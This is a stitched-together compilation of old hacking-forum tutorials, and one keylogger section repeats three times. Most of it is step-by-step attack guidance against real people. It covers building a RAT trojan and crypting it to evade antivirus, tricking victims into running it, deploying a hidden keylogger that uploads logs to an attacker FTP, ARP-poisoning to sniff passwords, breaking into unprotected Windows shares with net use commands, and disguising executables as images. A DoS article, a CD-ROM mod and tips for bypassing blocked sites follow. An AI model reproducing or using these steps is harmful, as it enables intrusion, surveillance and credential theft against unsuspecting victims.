this shows how hackers hack   remotly which is 90% undetectable
In this tutorial you will learn how to hack a computer any where in the world. Ok well not anywhere obviously things like the military and the goverment will have very high security so you definately wont be able 2 hack them using this method. I hope not aniways =.
A Major Notice If you are behind a router you will need to port forward your router. To do this you can use a DMS. Its hard to explain as every router has a different interface ( homepage that has a different layout ) so i suggest you go to google and search portforward.com. It will teach you how to port forward your router there.
Ok to begin with you will need these three tools
Daemon Crypt -
Pc Guard -
Yuri Rat -
Ok now that you have these three tools your 1st step will be to open up Yuri Rat and then click on server build
You should now have the following the screen
In this screen I want you to put your IP address into the DNS/IP section.
To get IP Address go to Start > Run > Type CMD and hit enter. When the black box appears type in IPCONFIG. You will then have your IP Address
Port: You Can Leave As Default (-7898-)
Assigned Name: Doesn’t effect how the server will work its just to keep you more organized so if you wanted to hack your friend “JOE” and specifically make this server for him then you may want to type something like “JOES TROJAN”.
Server Install Name: You should leave this as default as I myself don’t know what the difference is as every server you make is named server when it is 1st created anyway. Do not change it as it may make problems but I am not sure.
Ok as you can see there are more settings on the right hand side. I am going to recommend you settings for different purposes
To Hack A Friend For Fun: Uncheck Everything Unless You Want To Do Optional
(OPTIONAL) Melt Server - Your server will disappear into another folder
(OPTIONAL) Custom Icon if you want to make it more believable or something then get an icon of super Mario or something you get my drift
To Find Out Valuable Information: Check Everything
Ok Now You Are Finished Click Build
Your server will then be saved to your C: or Hard Drive which ever you know it as. Now we are going to make the server about 90% Undetectable. Only once has one of my servers been detected by an anti virus and I think it was a Norton not sure which version. Ive scanned more then once with Kasper Sky & Symantec Anti Virus and every time they said its clean so lets begin
Open Up Daemon Crypt
Select Your File by clicking browse and going to the folder your server is in. If you have not moved it, it will most likely be in C:
So Now You Have This
Click On Crypt and then you can close Daemon Tools
Now Install Your Pc Guard for Win32
When you open it you should get this
Ok you have to do basically the same thing as what you did with daemon tools. Click Browse and then find your server so that you have this
You then want to click on the General Settings and put these settings
Ok now you want to go to customization and make sure nothing is ticked
For the last step you want to click the protection methods tab and set it to plain. And then click on protect
Your server is now undetectable =)
Ok so now we have our server and everything is ready to go. Only thing now is to do some social engineering. Basically just lie to your friend/victim and tell them that it is a harmless file. If you do not know anything about your victim talk 2 him for like 3 days find out what he likes. Then lets say he likes football and naked women XD. say to him its a funny game where you play a 5minute 2D football match and if you win a sexc girl comes up on the screen and strips or something along them lines. Im not to good at social engineering. You could even say to your friend/victim that it is a patch for a game that you know that they have and it adds on extra things. The Server is now on there computer and they have double clicked it. If you checked the melt server option then the server will basically evaporate into their computer. They say hey its not working you say hey thats strange it works on my comp. Ahh fuck it i cant b bothered 2 send it again..
Ok so now you have the server running on there comp and it has opened up the default port for you to connect to.
Once again open Yuri Rat and click on listen. Yuri rat will then listen for your online servers that you have gave to people running on the default port 7898. If the person who you sent the rat to is not online you cant connect. When the server you sent out to your friend/victim a balloon notification will pop up. Note that yuri rat should still be listening for the servers. The server will show up in yuri rat. You right click and press connect. And there you go. you are now successfully connected to your victim
Ok now without uploading plug ins from yuri rat to your friends/victims computer you will only be able to do limited things with the program which are Download files from there comp & put files from your comp onto their comp.
When you are connected click on plug ins and them upload all of them.
You will then have access to keyloggers, screen capture and muc more. If you get stuck click on the help button and it wil tel you more aout plug ins
This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)
Ready? GO!
First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.
My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.
Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!
1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001
There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)
2. Once you download the program, install it.
3. Once installed, you open it up and see this:
This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!
1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.
DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:
http://rapidshare.com/files/236672890/projects.arm
DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/236673031/projects.Stats
Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).
Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!
Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.
Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!
„It takes a long time to learn simplicity.“
Sniifing with Cain and Abel
What is Cain & Able ?
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. (taken from their website)
Download Link :- http://oxid.netsons.org/download/ca_setup.exe (sometimes the link doesn’t work)
Softpedia link :- > here <
This tutorial is meant for sniffing only there are a lot other things you can do with cain as mentioned above
How to sniff with CAIN
Step 1:- Install Cain and Launch it
Step 2:- Click on Sniffer tab
Step 3:- Activate the sniffer by clicking 2nd icon (seems like micro chip — tooltip says Start/Stop Sniffer) from the left on top bar
Step 4:- Click on blue coloured Plus icon to scan for MAC address on LAN or simply right click ->scan MAC address
Step 5:- Click OK on the next window that comes -> CAIN is told to scan all the host in our subnet
Step 6:- Click on APR tab at the bottom
Step 7: Now Click on the Plus sign again at the top to add Computers to sniff on . A windows will pop up . In that windows . Select the router/gateway of your lan on the left side and the computer you want to sniff on the right side. Mostly the gateway is the one with ending octet 1 eg. 10.10.10.1 or 10.129.71.1 as in my case. Ususally last no. is 1
Step 8:- Now you’ll see the computers are added to the list. Click on 3rd icon from the left on the top which is like has a biohazard sign . You’ll see something like this
Step 9:- Step back and relax and let cain do its work you’ll see passwords rolling in passwords tab.(click it to enter password)
well its 3 in the morning and i don’t think anyone else is online besides me so this picture does’t show you any passwords
Suggestions and Feedbacks are appreciated
A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that’s an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let’s begin.
Head on over to:
CODE
http://www.ardamax.com/keylogger/
And scroll to the bottom. Download the free trial.
After downloading, open the program and install it. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.
Next, go to:
CODE
http://www.theserials.com/serial/serial_ardamax.html
Download the appropriate serial.
Now, open it, and it should give you a name and a jumble of letters and numbers.
A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that’s an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let’s begin.
Head on over to:
CODE
http://www.ardamax.com/keylogger/
And scroll to the bottom. Download the free trial.
After downloading, open the program and install it. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.
Next, go to:
CODE
http://www.theserials.com/serial/serial_ardamax.html
Download the appropriate serial.
Now, open it, and it should give you a name and a jumble of letters and numbers.
A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that’s an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let’s begin.
Head on over to:
CODE
http://www.ardamax.com/keylogger/
And scroll to the bottom. Download the free trial.
After downloading, open the program and install it. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.
Next, go to:
CODE
http://www.theserials.com/serial/serial_ardamax.html
Download the appropriate serial.
Now, open it, and it should give you a name and a jumble of letters and numbers.
Go back to the Ardamax icon at the bottom right, and right-click it.
Click the “Enter Registration Key” button.
Use your serial/crack to unlock the full version. Congratulations, you are now ready to make your first deployment package.
~NOTE~
If you want to attach the keylogger to an existing file, go ahead and place that on your desktop.
~NOTE~
Again, right click the icon at the bottom-right.
Click “Remote Installation”.
Click next.
Now, if you want to attach your keylogger to an existing file, tick the box that says “Append keylogger engine to..” etc etc.
If you tick it, click Browse, and select the file.
If not, continue down. The installation folder on target computer needs to remain Windows System Folder for added security, so leave it be.
Add any additional components you would like. I just leave mine as “log viewer” since all I grab are passwords from games.
From this point, click next.
Now, this part is self explanatory. I tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like “Wtf”, uninstall, etc.
Can’t have that, now can we?
Click next.
For Security, do what you want. I leave all of it as-is and click next again.
Now, untick the “Check for updates” box, else it will check for updates on their computer and they will know that they are bugged.
Click next.
Tick the “Start in hidden mode” box, and leave the “Run on windows startup” as-is.
You may pick a date to self destruct, if you like. Sounds noisy, right? It simply removes itself on selected date. If not, leave it alone, and it will never self destruct.
Click next.
Tick the “Send logs every..” box, and choose how frequently you would like to recieve information that has been sent.
Select ‘FTP’ and de-select everything else as a delivery method.
You may choose what you want to see. I take out screenshots. Causes lag for me.
Leave log format alone.
You may choose to send logs if it exceeds a certain size, or if you want it to send no matter what, untick the box, which is what I do.
Continue on! (next.)
Now the fun part. -_-.
Head on over to:
CODE
http://phpnet.us/
Make an account, etc etc.
Save your FTP Account name and password. You’ll need it in a moment.
This site will be the site that holds all information recieved by the keylogger.
When you’re done, scroll down a bit.
Under “FTP Accounts”, click “File Manager”.
Near the top, click the “New Dir” button, and create a directory by any name you want. My favorite is “lolbeans”.
Now, hold that thought. Bring the keylogger back.
In Ftp Host, put in:
ftp.phpnet.us
In “Remote Folder”, put in the new directory’s name you made. So, in this scenario, “lolbeans” without the “’s.
Fill in your Username and Password.
I leave Passive Mode checked because I’m not sure what it does, rofl. :[
Leave port alone as well. It’s default.
Now to make sure everything is correctly done, click test. It should tell you it all went through. And to double check, you can refresh your open window. Click your “lolbeans” directory and there should be a test file in it.
Click next, if you’re still alive.
Tick anything and everything you want.
Next.
If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step.
Browse where you want the keylogger to be placed. You can also change the icon, which is nifty. If you’re apologizing to a bitch ex girlfriend/boyfriend of yours, you can change the icon to a notepad and name it “Apology”, and they fall for it.
Next.
This screen will go over with you everything that you have chosen. Make sure it’s all correct.
Click Finish.
Now, if you appended the keylogger to something, you’re going to need to put the “install” (feel free to rename it so it’s not so obvious) and appended file into a .zip or .rar file.
If not, you have the simple “Install” on your desktop. Also, feel free to rename it to something like “Apology” or “OMFGFunnypicture!!!.jpg”
Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged.
Check your FTP Directory that you made as frequently as you told it to send logs, and you’ll have everything you need.
Feel free to test it out on yourself.
The powerful chip at the heart of Sony’s PlayStation gaming console has been used to crack passwords faster than ever before.
Security researcher Nick Breese used a PS3 to crack supposedly strong eight-character passwords in hours.
Typically, previous attempts to crack such passwords took days to get the same result.
Eight-character passwords are used to protect PDF and Zip files as well as those produced by Microsoft Office.
The work to turn the PS3 into a password cracker was carried out by Nick Breese, who works for Auckland-based Security Assessment.
The Cell processor at the heart of the PS3 is the key to speeding up the time it takes to crack a password.
In a presentation given at the Kiwicon security conference in mid-November, Mr Breese said a powerful Intel chip could crank through 10-15 million cycles per second.
The architecture of the Cell processor meant it could speed through 1.4 billion cycles per second. This speed boost was possible because each Cell chip had several processing cores - each one of which could be effectively trying passwords at the same time.
This was important when attempting “brute force” attacks that go through all possible combinations for a password.
Speaking to the Sydney Morning Herald, Mr Breese said although the PS3 could be used to crack eight-character passwords featuring letters and numbers, stronger encryption systems - such as those used to safeguard web transactions - remained safe.
Mr Breese’s research comes soon after work by Russian company Elcomsoft to use graphics cards to speed up password cracking.
I’m board so im going to post some this up ..
ok 1st of your going to need website hosting to do this, if you all ready have some then your set if not try looking at
www.0php.com
http://www.free-webhosts.com/free-php-webhosting.php
you can find free hosting there ok now..
open up a new notepad call it ” iplogs.txt “
Upload it where eva you want this i.p logger on your server now change the permissions of that txt file to 777 so that the php script can read, write, execute the txt file
ok then now it is time for the coding part
save it as anythink you want.php
ok 1st off i would like to say the 2nd last line can be edit for example :
PRINT(”Your Ip was logged how im going to hack you
“);
or what eva you want to write but the that show there i.p address on the page Smiley
ok upload it to the same spot as the iplogs.txt file and bamm your ready to go
type in the url of the .php and it will log this info to the text file
how change the permissions of that txt file to 777 “
Use an FTP program such as FileZilla, you can right click on the file and you can the permissions
is some common hacking techniques used by some hacker out there..
This is for educational purpose only, this hack works with unpatched version of Windows 2000/NT/XP. (only works if the shared drive that has no password set by administrator)
Step 1:
-Get a IP (range) scanner.
-Scan the victim’s ip on TCP/IP port 1XX (i put some XX in the port number so as di cya magaya for actual testing)
Most port scanners (nmap being the most prominent example) correctly
report ports as either open, closed or filtered.
“Mahirap” o hard to find some open port open these days because of firewall (sa patched windows)enable that will either “filtered or closed” ang port if u used ip scanner..
What is filtered or closed port?
Use an analogy of the cops coming to your place and looking for you. Having a filtered port is like them knocking on the door, and you saying “I’m not here”. Having a closed port is like them knocking on the door, and no one answering. With a filtered port, you know there is an active system behind that port.
As far as from a security standpoint, to most hackers, when they see closed they don’t think of a firewall, they think the service is just not running. When I see filtered, and its a port I want to get to, I instantly think, oh, ok, is there some backdoor I can punch thru the firewall? Can I DOS the firewall? Can I remotely administer the firewall?
Step 1.1
-Open a dos prompt
-Do this by going to start/run
-Type cmd
When you are already in DOS command prompt type
-NMAP -v -p 159 77.106.2.1-110 (example target ip range)
-when you got an open port proceed to step 2
Step 2
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
If you see this your in:
Step 3
type down:
c:windows>net view \255.255.255. 255
Step 4
type down:
c:windows>net use x: \255.255.255. 255SYSVOL
(you can replace x: by anything letter you want but not your own drive
letters.)
Note:SYSVOL is the name of the shared harddrive.
If the command is successful we will get the confirmation.
The command was completed successfullly.
Bingo your inside the system now..
You can now execute any dos command e.g. x:dir
(you will experience a lag in the system since it is a remote computer)
Now open windows explorer or just double click on the My Computer icon
on your desktop and you will see a new network drive X:> . Now your are a
hacker.
This tutorial is warning for those who have old os like unpatched XP,NT,2000..always protect ur system..upgrade ur o system.. ..protect ur port specially port 139..Remember Hacking other`s comp is stealing..
hello
Converting .exe files to .jpg (
1. Firstly, create a new folder and make sure that the options ’show hidden files’ is checked and ‘hide extensions for
known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on
your pc.
2. Paste a copy of your server on the new created folder. let’s say it’s called server.exe
(that’s why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u
have to write this: C:WINDOWSsystem32cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you
gotta write C:WINDOWSsystem32cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the
server will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a
new window will pop up and u have to write this: %SystemRoot%system32SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection
from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected
to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want
considering the person and the knowledge they have on this matter.
15. For me for example I always want the shortcut showing first so can be the first file to be opened.
So I rename the server to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first.
If you set hidden properties to the server (picture.jpeg) then u don’t have to bother with this detail but I’m warning
you, the hidden file will always show up inside of a zip file or rar.
16. So the best way to send these files together to someone is compress them into zip or rar.
17. inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the
shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to
open it.
Originally written by Cm2, i rewrote it :).
Method 1
To view someone’s IP# when they send you hotmail email do this:
1) Click “Options” on the upper right side of the page.
2) On the left side of the page, Click “Mail”
3) Click “Mail Display Settings”
4) Under “Message Headers” select “Full” or “Advanced”
5) Click ok
Method 2
reg a dydns account and install the ip pointer, so each time you ping the host name you regestored
for example:
you regestor the host name myhost.dydns.com, then you keep a little software running on the target host. The little software will keep update your IP to dydns.com server.
so at your pc just start cmd, and ping myhost.dydns.com, it will give you the most updated ip address.
Method 3
neverender, what doesn’t work for you? Simply type in nc -vvv -l -p 80 on your box, which will set it to listen in verbose mode on port 80. Then give them a link to your IP address (for example: 111.111.111.11) and tell them to type it in their browser. The browser should resolve the address as well as append port 80 automatically. Just make sure that your friend is not very computer literate.
Method 4
Just download a very simple server such as this one and install it on your comp. Then run it and give your ip to the person you want and tell them to connect to it through a browser. Your server will log their connection and you will get their IP.
link:http://www.download.com/Abyss-Web-Server/3000-2165-10283992.html?tag=lst-0-6
Other Ways
-www.imchaos.com and make a “spy poll” to put in ur profile, this will tell u the IP of anybody who answers ur poll
-originalicons.com there is a page for doin it (i dont like it, but it works)
-or irc
Here is a more detailed tutorial about using NetCat.
http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html
Windows users can download NetCat from here:
http://www.atstake.com/research/tools/network_utilities/
The idea is, one Google advanced search string is filetype: . It is used to find out any file only. Now I’m using this string as a tool,
I am searching for filetype:eml eml intext:”Content-Type: image/jpeg”.
Look at the keyword. It is finding a file with extension eml and that eml should have a Line Content-Type: image/jpeg. Now remember the old days, MIME encoding of a email. When ever we are attaching a .jpg file, that line should come in .eml file. So, the full keyword is searching for filename any with extension .eml which is email file extension, and it should contain a .jpg file, may be some photo or other picture from the web. You can’t belive if you are not checking it yourself.
Keyword : filetype:eml eml intext:”Content-Type: image/jpeg”
Here is ur example lollxxx
http://www.google.com.pk/search?hl=en&q=filetype%3Aeml+eml+intext%3A%22Content-Type%
Types of Attacks on Web Servers
By Najmi
Newspapers Internet magazines came with cover stories when Denial of service (DoS) attacks assaulted a number of large and very successful companies’ websites last year. Those who claim to provide security tools were under attack. If Yahoo, Amazon, CNN and Microsoft feel victim to DoS attacks, can any site-owner feel safe?
In this article we’ll try to make site owners understand the “In and Outs” of DoS andDDoS attack methods, vulnerabilities, and potential solutions to these problems. Webmasters are usually seen searching for solutions to new security threats and ways of patching-up before it is too late.
DoS:
In a Denial of Service (DoS) attack, the attacker sends a stream of requests to a service on the server machine in the hope of exhausting all resources like “memory” or consuming all processor capacity.
DoS Attacks Involve:
Jamming Networks
Flooding Service Ports
Misconfiguring Routers
Flooding Mail Servers
DDoS:
In Distributed DoS (DDoS) attack, a hacker installs an agent or daemon on numerous hosts. The hacker sends a command to the master, which resides in any of the many hosts. The master communicates with the agents residing in other servers to commence the attack. DDoS are harder to combat because blocking a single IP address or network will not stop them. The traffic can derive from hundred or even thousands of individual systems and sometimes the users are not even aware that their computers are part of the attack.
DDoS Attacks Involve:
FTP Bounce Attacks
Port Scanning Attack
Ping Flooding Attack
Smurf Attack
SYN Flooding Attack
IP Fragmentation/Overlapping Fragment Attack
IP Sequence Prediction Attack
DNS Cache Poisoning
SNMP Attack
Send Mail Attack
Some of the more popular attack methods are described below.
FTP Bounce Attack
FTP (File Transfer Protocol) is used to transfer documents and data anonymously from local machine to the server and vice versa. All administrators of FTP servers should understand how this attack works. The FTP bounce attack is used to slip past application-based firewalls.
In a bounce attack, the hacker uploads a file to the FTP server and then requests this file be sent to an internal server. The file can contain malicious software or a simple script that occupies the internal server and uses up all the memory and CPU resources.
To avoid these attacks, the FTP daemon on the Web servers should be updated regularly. The site FTP should me monitored regularly to check whether any unknown file is transferred to the Web server. Firewalls also help by filtering content and commands. Some firewalls block certain file extensions, a technique that can help block the upload of malicious software.
Port Scanning Attack
A port scan is when someone is using software tosystematically scan the entry points on other person’s machine. There arelegitimate uses for this software in managing a network.
Mosthackers enter another’s computer to leave unidentifiable harassing messages,capture passwords or change the set-up configuration. The defense for this isthrough, consistent network monitoring. There are free tools that monitor forport scans and related activity.
Ping Flooding Attack
Pinging involves one computer sending a signal to anothercomputer expecting a response back. Responsible use of pinging providesinformation on the availability of a particular service. Ping Flooding is theextreme of sending thousands or millions of pings per second. Ping Flooding cancripple a system or even shut down an entire site.
APing Flooding Attack floods the victim’s network or machine with IP Pingpackets. At least 18 operating systems are vulnerable to this attack, but themajority can be patched. There are also numerous routers and printers that arevulnerable. Patches cannot currently be applied throughout a global networkeasily.
Smurf Attack
A Smurf Attack is modification of the “ping attack”and instead of sending pings directly to the attacked system, they are sent to abroadcast address with the victim’s return address. A range of IP addressesfrom the intermediate system will send pings to the victim, bombarding thevictim machine or system with hundreds or thousands of pings.
One solution is to prevent the Web server from being usedas a broadcast. Routers must be configured to deny IP-Directed broadcasts fromother networks into the network. Another helpful measure is to configure therouter to block IP spoofing from the network to be saved. Routers configured assuch will block any packets that donor originate in the Network.To be effective this must be done to all routers on the network.
SYN Flooding Attack
This attack exploits vulnerability in the TCP/IPcommunications protocol. This attack keeps the victim machine responding back toa non-existent system. The victim is sent packets and asked to response to asystem or machine with an incorrect IP address. As it responds, it is floodedwith the requests. The requests wait for a response until the packets begin totime out and are dropped. During the waiting period, the victim system isconsumed by the request and cannot respond to legitimate requests.
When a normal TCP connection starts, a destination hostreceives a SYN (synchronize/start) packet from a source host and sends back aSYN ACK (synchronize acknowledge) response. The destination host must the hearan acknowledgement, or ACK packet, of the SYN ACK before the connection isestablished. This is referred as the “TCP three-way handshake”.
Decreasingthe time-out waiting period for the three way handshake can help to reduce therisk of SYN flooding attacks, as will increasing the size of the connectionqueue (the SYN ACK queue). Applying service packs to upgrade older operatingsystems is also a good countermeasure. More recent operating systems areresistant to these attacks.
IPFragmentation/Overlapping Fragment Attack
To facilitate IP transmission over comparatively congestednetworks. IP packets can be reduced in size or broken into smaller packets. Bymaking the packets very small, routers and intrusion detection systems cannotidentify the packets contents and will let them pass through without anyexamination. When a packet is reassembled at the other end, it overflows thebuffer. The machine will hang, reboot or may exhibit no effect at all.
Inan Overlapping Fragment Attack, the reassembled packet starts in the middle ofanother packet. As the operating system receives these invalid packets, itallocates memory to hold them. This eventually uses all the memory resources andcauses the machine to reboot or hang.
IPSequence Prediction Attack
Usingthe SYN Flood method, a hacker can establish connection with a victim machineand obtain the IP packet sequence number in an IP Sequence Prediction Attack.With this number, the hacker can control the victim machine and fool it intobelieving it’s communicating with another network machines. The victim machinewill provide requested services. Most operating systems now randomize theirsequence numbers to reduce the possibility of prediction.
DNSCache Poisoning
DNS provides distributed host information used for mappingdomain names and IP addresses. To improve productivity, the DNS server cachesthe most recent data for quick retrieval. This cache can be attacked and theinformation spoofed to redirect a network connection or block access to the Web sites),a devious tactic called DNS cache poisoning.
The best defense against problems such as DNS cachepoisoning is to run the latest version of the DNS software for the operatingsystem in use. New versions track pending and serialize them to help preventspoofing.
SNMP Attack
Most network devices support SNMP because it is active bydefault. An SNMP Attack can result in the network being mapped, and traffic canbe monitored and redirected.
The best defense against this attack is upgrading toSNMP3, which encrypts passwords and messages. SinceSNMP resides on almost all network devices, routers, hubs, switches, Servers andprinters, the task of upgrading is huge. Some vendors now offer an SNMP Managementtool that includes upgrade distribution for global networks.
UDP Flood Attack
AUDP Flood Attacks links two unsuspecting systems. By Spoofing, the UDP floodhooks up one system’s UDP service (which for testing purposes generates aseries of characters for each packet it receives) with another system’s UDPecho service (which echoes any character it receives in an attempt to testnetwork programs). As a result a non-stop flood of useless data passes betweentwo systems.
Send Mail Attack
In this attack, hundreds of thousands ofmessages are sent in a short period of time; a normal load might only be 100 or1000 messages per hour. Attacks against Send Mail might not make the front page,but downtime on major websites will.
For companies whose reputation dependson the reliability and accuracy of their Web-Based transactions, a DoS attackcan be a major embarrassment and a serious threat to business.
Conclusion
Frequent denial-of-service attacks and achange in strategy by “Black-Hat Hackers” are prompting enterprises todemand technology that proactively blocks malicious traffic.
Tools and services that reflectapproaches to combat such DoS attacks have been introduced with time. These arenormally upgrades to what was produced before. No solution is ever said to be anultimate solution to defend DoS attacks. Despite the new technology coming everyday, the attacks are likely to continue.
Source :- http://www.techiwarehouse.com/cms/engine.php?page_id=21b0d480
There are two types of CD-ROM drives we can mod:
24x to 40x
40x or higher
Drives slower than 24x are too old to be modded.
24x to 40x CD ROMs
Laser Head Adjustments:
The track pitch of CDs is 1.6 microns, and the track pitch of DVDs is only 0.8 microns. The minimum length of track pits of CDs is 0.843mm, and the minimum length of track pits of DVDs is 0.293mm. That's why DVD discs can store much more data in the size of a CD.
Pinpointing this situation, we need to adjust the laser head so it can read discs with smaller track pitchs and shorter track pits. Open up the CD-ROM drive, do you see a lens on the rail? That's the laser head. On the side of the laser head, there's a screw you can adjust.
This is the key of this mod.
This screw can adjust the size of the laser beam that lands on the disc. Referring to the above, after adjusting, the laser beam should be less than 0.293mm, to suit the needs of DVD discs. So turn that screw 2-3 times. I got this number through trial and error. Mark with a pencil, in case you forget how many times you turned that screw.
Speed adjustments:
DVD-ROM drives can play DVD movies smoothly at 4x speed. If we're modding a 32x CD-ROM drive, the rotation speed is obviously too high, increasing heat, and shortening the life of the drive.
So we need to decrease the speed of it.
Most people know that power supplies can provide 5V (red wire) and 12V (yellow wire) electricity output for Molex connectors. Find the Molex connector you'll plug into the modded CD-ROM drive, cut the yellow wire or insulate it with tape, so only 5V of electricity is transferred to the CD-ROM drive. The speed of the drive is now 32 * 5/17 = 9.41x and can now fulfill our requirements.
40x or higher CD ROMs
When 40x CD-ROM drives are released, most manufacturers are already producing DVD-ROM drives. To lower cost, they use the same core as DVD-ROM drives with DVD functions disabled. What we need to do here is to re-enable the DVD function.
Open up the CD-ROM, behind the circuit board, look for a jumper that says DVD JUMP. Find a jumper to connect this jumper. Thin metal wire also works fine.
OK, so the DVD function is unlocked, but we still need to decrease the speed. Use the instructions above on how to decrase the speed of the drive.
Notes:
Modded drives cannot be detected in POST, that means you cannot use it in DOS. But once you get into Windows, the drive works fine.
Modded drives have no region code problems.
Modded drives MIGHT NOT read DVD9 discs, that's why I said you can watch most retail DVDs in the beginning
yeah! its true, you can actually download HD videos uploaded on YouTUBE.
KeepHD is online web service tool which let you download you tube high definition video easily.
Apart from high definition video , you can also download you tube videos in mobile friendly .3gp format.
It also support mp4 and .flv format. In case if you don’t want to download video and just want to watch it online
all must be aware that in some schools, colleges or office social network sites like Friendster, Facebook, Myspace, Bebo, Hi5, Orkut, etc? are blocked by the Administrator.
Here’s few ways you can bypass the restrictions and surf like normal, but please check with your local authorities before using them.
1)Using IP Instead of URL
This depends on the software/application used. Sometimes blocked sites are stored as a list of URLs (eg. www.yahoo.com, www.donwload.com,etc) and typing the IP instead of the URL might sometimes work. In a local computer, doing a ping domain.com command in Command Prompt (Mac users use Terminal) will return you the IP address. You can also do it online via www.whatsmyip.org
2)Redirection with Short URL service
Sometimes the URL you intend to browse might be ban, but converting them to another a shorter URL with short URL services might just help you to bypass the settings.
Here’s 2 Short URL service we’ve previously mentioned - MooURL, SnipURL
3)Google Cache
Search engines like Google and Yahoo cache webpages and these cached pages are stored in search engines themselves, which likely will be added to the blocked list. Click on the ‘cache’ will bring you to a cache version of the page, as updated as how Google caches it.
4)Internet Archive - Wayback Machine
Wayback Machine is a internet service that periodically keeps a copy of almost all websites in the Internet way from the date they’re started. Clicking on the latest copy of what Wayback Machine have should be somewhat similar to the real site. Another way to access blocked sites via caches.
5)Anonymous Surfing
Some site allows you to take advantage of their proxy or domain to surf other sites as anonymous. Here’s some proxy websites
# http://www.hidemyass.com
# http://www.anonymizer.com
# http://www.wujie.net
# http://www.ultrareach.net
# http://surfshield.net
# http://www.guardster.com/subscription/proxy_free.php
# http://anonymouse.ws/anonwww.html
# http://www.browser-x.com
# http://www.spysurfing.com
# http://www.xerohour.org/hideme
# http://www.proxyz.be
6)Use Proxy in Browsers
There are tons of sites out there that distributes free proxies of almost any country. Here’s an example. Check out the following methods on how/where to insert proxies in your web browsers.
Proxy Surfing - Firefox
Under Advanced tab, select Network tab, then click inside Connection Settings. Select Manual proxy configuration, put proxy under HTTP proxy.
Proxy Surfing - Internet Explorer
Go to Tools -> Internet Options. Select Connections tab. Click into LAN Settings, check Proxy Server. Insert your proxy URL inside Address.
7)Bypass with Translations services
Online translation services like AltaVista BabelFish, Google Translate allows you to translate a website from one language to another and display the translated results on their own page.The trick here is to enter the URL (website you’re blocked), retranslate it even if you don’t need to and let Google or AltaVista fetch you the content.
8)Subscribe to RSS Feed
This might not work for all sites, but if the site you intended to visit provides RSS feeds, you can subscribe and read it with a RSS reader, or have it regularly send the contents to your email
9Retrieve web pages via Email
Web2Mail is a free service that sends websites you want to read right into your inbox. All you need to do is send an email to www@web2mail.com with the URL as subject title.
Normally, you can save Images/Pictures from Flickr (or any website) by right clicking the photograph and saying "Save Image As.." but in the case of protected Flickr images,
